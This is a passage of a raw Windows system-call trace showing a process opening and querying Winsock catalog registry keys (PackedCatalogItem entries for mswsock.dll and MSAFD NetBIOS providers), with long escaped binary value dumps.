 00616   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\30\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0i\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0i\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0j\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\03\0j\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0l\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\30\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0i\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0i\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0j\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\03\0j\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0l\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0l\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\30\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0i\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0i\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0j\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\03\0j\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0k\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0l\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00617   748   NtClose  (80, ... ) == 0x0
 00618   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000013"}, ... 80, ) }, ... 80, ) == 0x0
 00619   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00620   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00621   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\31\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0n\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0n\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0o\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\04\0o\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\31\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0n\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0n\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0o\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\04\0o\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\31\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0n\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0n\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0o\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\04\0o\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0p\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00622   748   NtClose  (80, ... ) == 0x0
 00623   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000014"}, ... 80, ) }, ... 80, ) == 0x0
 00624   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00625   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00626   748   NtAllocateVirtualMemory  (-1, 1355776, 0, 4096, 4096, 4, ... 1355776, 4096, ) == 0x0
 00627   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\32\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0t\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0t\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0u\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\05\0u\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0w\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\32\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0t\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0t\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0u\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\05\0u\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0w\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0w\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\32\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0t\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0t\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0u\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\05\0u\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\